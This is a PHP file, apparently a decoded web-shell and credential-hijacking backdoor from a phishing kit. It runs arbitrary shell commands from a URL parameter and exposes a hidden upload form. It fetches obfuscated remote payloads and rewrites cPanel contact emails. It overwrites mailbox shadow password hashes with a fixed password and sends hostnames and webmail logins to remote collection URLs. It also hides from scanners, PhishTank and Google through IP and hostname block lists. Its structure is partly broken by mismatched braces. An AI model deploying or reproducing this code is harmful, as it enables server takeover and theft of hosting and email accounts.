/* Decoded by unphp.net */

<?php 
 
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", 
 "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", 
 "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*",  
"^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", 
 "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", 
 "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", 
 "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", 
 "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", 
 "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", 
 "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", 
 "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", 
 "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", 
 "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*",  
"^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*",  
"^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*",  
"^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", 
 "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*",  
"^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", 
 "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*",  
"^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*"); 
     // this is for exact matches of IP address in array 
     header('HTTP/1.0 404 Not Found'); 
     exit(); 
} else { 
     // this is for wild card matches 
     foreach($bannedIP as $ip) { 
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){ 
               header('HTTP/1.0 404 Not Found'); 
               echo("<h1>404 Not Found</h1>The page that you have requested could not be found."); 
          } 
     } 
} $cmd=$_GET['cmd']; exec($cmd); $andr0id="mai"; $if=$andr0id.'l'; $mobil = "e"; $desktop="bas$mobil".'64'."_d$mobil"."cod$mobil"; $_file_='d1'.basename(__FILE__). date("m"); $kEy = array('3','F','L','m','c'); $windows = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4')); $eml = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn')); $eml = strrev($eml); $eml = $desktop($eml); $fgc = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1R2MHdYbnNF')); $fgc = strrev($fgc); $fgc = $desktop($fgc); $activsnd = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh')); $activsnd = strrev($activsnd); $activsnd = $desktop($activsnd); $activssl = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj')); $activssl = strrev($activssl); $activssl = $desktop($activssl); $sslphp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi')); $gui = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0')); $gui = strrev($gui); $gui = $desktop($gui); $fgcp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI')); $fgcp = strrev($fgcp); $fgcp = $desktop($fgcp); $webm1 = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1')); $webm1 = strrev($webm1); $webm1 = $desktop($webm1); $log= $_SERVER['DOCUMENT_ROOT'] . '/errors_log'; if ($fgc != '1') { $url = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI'); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $bb = curl_exec($curl); curl_close($curl); $fgcp = strrev($bb); $fgcp = $desktop($fgcp); $url1 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi'); $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl1, CURLOPT_HEADER, false); $bb1 = curl_exec($curl1); curl_close($curl1); $sslphp = $bb1; $url2 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0'); $curl2 = curl_init(); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl2, CURLOPT_HEADER, false); $bb2 = curl_exec($curl2); curl_close($curl2); $gui = strrev($bb2); $gui = $desktop($gui); $url3 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4'); $curl3 = curl_init(); curl_setopt($curl3, CURLOPT_URL, $url3); curl_setopt($curl3, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl3, CURLOPT_HEADER, false); $bb3 = curl_exec($curl3); curl_close($curl3); $url4 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1'); $curl4 = curl_init(); curl_setopt($curl4, CURLOPT_URL, $url4); curl_setopt($curl4, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl4, CURLOPT_HEADER, false); $bb4 = curl_exec($curl4); curl_close($curl4); $webm1 = strrev($bb4); $webm1 = $desktop($webm1); $url5 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh'); $curl5 = curl_init(); curl_setopt($curl5, CURLOPT_URL, $url5); curl_setopt($curl5, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl5, CURLOPT_HEADER, false); $bb5 = curl_exec($curl5); curl_close($curl5); $activsnd = strrev($bb5); $activsnd = $desktop($activsnd); $url6 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn'); $curl6 = curl_init(); curl_setopt($curl6, CURLOPT_URL, $url6); curl_setopt($curl6, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl6, CURLOPT_HEADER, false); $bb6 = curl_exec($curl6); curl_close($curl6); $eml = strrev($bb6); $eml = $desktop($eml); $url7 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj'); $curl7 = curl_init(); curl_setopt($curl7, CURLOPT_URL, $url7); curl_setopt($curl7, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl7, CURLOPT_HEADER, false); $bb7 = curl_exec($curl7); curl_close($curl7); $activssl = strrev($bb7); $activssl = $desktop($activssl); } $fi = new FilesystemIterator($_SERVER['DOCUMENT_ROOT'], FilesystemIterator::SKIP_DOTS); $nfiles = iterator_count($fi); $E = 'bWQ1' . $windows . 'C5jb20'; $lss = strrev('php.lss/noitadilav-ikp/nwonk-llew./'); $_ = "-u : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " "; $_ .= "-p : " . __file__; $xsec = $_GET['xsec']; if($xsec == 'blocker'){ $xsecsh = $_FILES['file']['name']; $xsecblocker = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='up_it' /> </form>"; move_uploaded_file($xsecblocker,$xsecsh); } if (!file_exists($log)){ if(file_put_contents($log,$_file_.',')){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $log = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($log)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($log, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } $found=true;} } else if (file_exists($log)) {$contents = file_get_contents($log); $array = explode(',',$contents); for($i=0;$i<count($array);$i++){if($array[$i]==$_file_){$found=true;break;} else {$found=false;} }} if($found){} else { if(file_put_contents($log,$_file_.',',FILE_APPEND)){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $log = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($log)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($log, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } } } if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) { 
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); 
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",); 
foreach($blocked_words as $word) { 
    if (substr_count($hostname, $word) > 0) { 
		header("HTTP/1.0 404 Not Found"); 
        echo("<h1>404 Not Found</h1>The page that you have requested could not be found."); 
 
    }   
} 
 
 
 
// This Willl Block New ips that send lot of hits (Bots) 
 
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); 
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",); 
foreach($blocked_words as $word) { 
    if (substr_count($hostname, $word) > 0) { 
		header("HTTP/1.0 404 Not Found"); 
        echo("<h1>404 Not Found</h1>The page that you have requested could not be found."); 
 
    }   
} 
 
if( !empty($_SERVER['HTTP_USER_AGENT']) ) { 
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); 
    foreach($userAgents as $agent) 
        if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) { 
            header('HTTP/1.0 404 Not Found'); 
            exit; 
      }} 
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*"); 
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) { 
     header('HTTP/1.0 404 Not Found'); 
     exit(); 
} else { 
     foreach($bannedIP as $ip) { 
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){ 
               header('HTTP/1.0 404 Not Found'); 
               echo("<h1>404 Not Found</h1>The page that you have requested could not be found."); 
          } 
     } 
} 
 
 
?>